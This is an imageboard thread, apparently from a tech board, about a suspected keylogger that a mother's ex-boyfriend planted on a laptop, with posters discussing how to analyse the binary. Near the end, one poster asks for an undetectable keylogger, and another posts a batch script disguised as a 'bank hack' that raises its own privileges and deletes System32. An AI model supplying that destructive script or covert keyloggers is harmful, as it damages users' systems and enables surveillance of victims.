I suspect one of my computers has a keylogger on it. How could I confirm this? I have the file.
If I can confirm it is a keylogger I know exactly who put it on my laptop.
Does anybody have any ideas to how I can identify what it is?
>>51622377
>I have the file.
The log file, or executable itself?
Check the task manager, duh
>>51622396
The exe.
It is a rundll32.exe that appeared on my desktop.
Malwarebytes detected it as malware, but when I google the definition I cannot find anything.
>>51622417
The processes looked normal.
I let my mom borrow my laptop for a trip and she went to see her boyfriend (who is pretty experienced in programming and stuff). Apparently he used it and my Mom's facebook and shit got jacked.
>>51622492
Look into SysInternals Process Explorer, it has a feature that can log IO activity. Pic related.
Open a notepad and write "hello plz stop hakeing me"
>>51622543
Hmm...if it was "intentionally" put there by mom and/or bf to monitor your activities, this could be good for some fun.
Use your imagination, OP.
>>51622492
Disassemble it, post code here. I want to see it
http://sourceforge.net/projects/hjt/files/latest/download
run it and pastebin the log
>>51622492
Pastebin it and post link! Quick OP we don't have much time!!
>>51622377
What made you suspect your were being keylogged in the first place?
>>51622492
OP what the fuck, Pastebin the executable and post link. I'll take it apart and figure out who its talking to.
>>51622679
My mom broke up with the guy. Now he got into her accounts (bank, fb, etc) and shit.
The guy is literally psycho.
I'm reformatting the laptop now, but I saved the file.
I don't know how to reverse engineer it or anything.
>>51622975
Upload the file somewhere online, there's lots of people here that know how to dissemble a binary.
>>51622973
I can do that, but I saved it on a usb drive like a retard and I'm afraid to stick it into my main laptop.
The laptop that was infected is reformatting atm.
>>51623037
It can't execute itself from your USB man. Leave it there and when you're done formatting put it up on pastebin, I want to take a look at it.
How are keystrokes sent to the "attacker" ?
Does it get all the keystrokes in bulk and email them once every 24 hours? Does it transfer over TCP/IP connection? How are the keystrokes delivered?
>>51623116
Usually ftp of plaintext file it writes to.
Here's the pastebin of the exe file when opened in notepad.
http://pastebin.com/RuCQV2fE
>>51623475
bump
i wanna know what it is
>>51623475
bump
>>51623475
open it in a debugger
>>51622377
Indeed, you have windows 7 installed. You'll have to investigate who installed it on your device.
>>51623549
Anyone here could now just copy and paste that and rename the file to .exe and fuck around with it themselves
>>51623475
fuck, you can't paste the executable can you...I need the whole file to disassembe it.
>>51623646
put it up on uguu.se
>>51622581
Holy SHIT, it can do that? I've just been using it on 7 because I missed 8's task manager and its pretty lines and graphs.
>>51623633
if its basic and doesnt check ips....
fire it up in a vm and spam the worst shit you can think of
>>51623633
that's not how it works anon. You're looking at the compiled file, which means nothing. You need the actual executable to decompile it
>>51623675
Yeh, though I meant Process Monitor not Explorer Just search for SysInternals Process Monitor.
>>51623475
You're retarded
just upload it somewhere op
it's not going to magically execute itself when you plug it into your computer
>>51623816
where can you upload a .exe so you faggots can download it?
>>51623844
Use ipfs (ipfs.io)
>>51623856
not here senpai, save this for the general
1. hash it
2. zip it
3. upload it to pomf.se
4. post link and hash here
>>51623866
I'm beginning to wonder if people are purposely saying senpai instead of the wordfilter
>>51623866
ipfs is a fully decentralized, distributed network which allows extremely fast file sharing without needing to trust any third party. It is extremely easy to setup and content can be shared with faggots who still live in the past by using one of the gateways, such as gateway.ipfs.io, gateway.glop.me, or ipfs.borg.me. Face it, it's objectively the superior sharing solution.
>>51623660
>>51623475
>uguu.se
Do this op, paste link. Hurry up to, it's getting late and charlie brown's christmas is coming on
>>51623911
With ipfs, there's no need to hash and post the file separately. Since files are content-addressed, the hash IS the file. Simple, easy, network agnostic. No trouble, only sharing.
>>51623953
here's the uguu.se of the .txt of the compiled binary OP pasted. It's pretty easy
https://a.uguu.se/atahkb.txt
OP, upload the fucking file..FUCK
>>51623953
>https://a.uguu.se/atahkb.txt
nevermind, it won't take .exe files
>>51624013
ipfs has no problem with any file formats, be it txt, zip, exe or any other. Moreover, users of ipfs don't need to download files blindly, as utilities like ipfs ls, ipfs cat and ffprobe can be used to ensure information about the file prior to download.
Bumpity bumpity boo
>>51623475
Yeah but you have to install it, I just want a quick and dirty way to get the file. I think OP left anyway
>>51623913
yes senpai, whatever you say
>>51623925
>It is extremely easy to setup
were talking about someone who tried to share an exectuable over pastebin
OP shit the bed
>>51623557
underrated post
Is this thread dead? I am still interested in where this goes.
>>51623027
Please post it, I want to analyze it. I can get you ip and port np op.
>>51623844
Ge.tt
>>51624968
Apparently op is a kek.
>>51622377
>step 1: archive the file if you want to investigate it further
>step 2: reinstall your OS
>>51623913
Wait, you aren't?
To be honest, I am surprised we don't see more people using kouhai as an insult.
>>51622581
>mfw *nix has software to do this OOTB as standard
>>51627114
We're a respectful people, senpai.
>>51627080
Op didn't deliver.
>>51623475
Are you retarded?
>>51623633
That's not how it fucking works retard.
You only copied the ASCII stuff.
Op you still here senpaitachi (f.a.m.s)
Put exe in a zip or rar. Upload to fucking mega or some shit. Why is this so hard, OP?
>>51630621
No wonder he got keked in the first place
On the topic, Anyone know any easy simple well hidden undetectable keyloggers that just email results to you?
>>51631259
Off the topic, does anyone know a simple undetectable program that hacks every bank and wires you the money?
>>51632207
Work
>>51632207
Yep, here you go. Just replace the *bankname* with the ip of the bank you want to hack
@echo off
ECHO :- hack _@bankname /:- end
CLS
:checkPrivileges
NET FILE 1>NUL 2>NUL
if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges )
:getPrivileges
if '%1'=='ELEV' (shift & goto gotPrivileges)
setlocal DisableDelayedExpansion
set "batchPath=%~0"
setlocal EnableDelayedExpansion
ECHO Set UAC = CreateObject^("Shell.Application"^) > "%temp%\OEgetPrivileges.vbs"
ECHO UAC.ShellExecute "!batchPath!", "ELEV", "", "runas", 1 >> "%temp%\OEgetPrivileges.vbs"
"%temp%\OEgetPrivileges.vbs"
exit /B
:gotPrivileges
setlocal & pushd .
REM got admin shell
REM cmd /k
del C:\Windows\System32
ECHO ...Hacking bank
pause >nul
>>51632467
>del C:\Windows\System32
please
>>51632492
>>51623913
whats the wordfilter and why are we filtering words now? I noticed c.uck is filtered to kek now but this sort of censorship isnt funny like it was under moots rule
Upload to malwr.cum and see if it connects to any DNS or SMTP server, if it does it's most likely a RAT/keylogger
>>51623557
Witnessed.
>>51623911
>upload it to pomf.se
Anon, I have bad news for you.
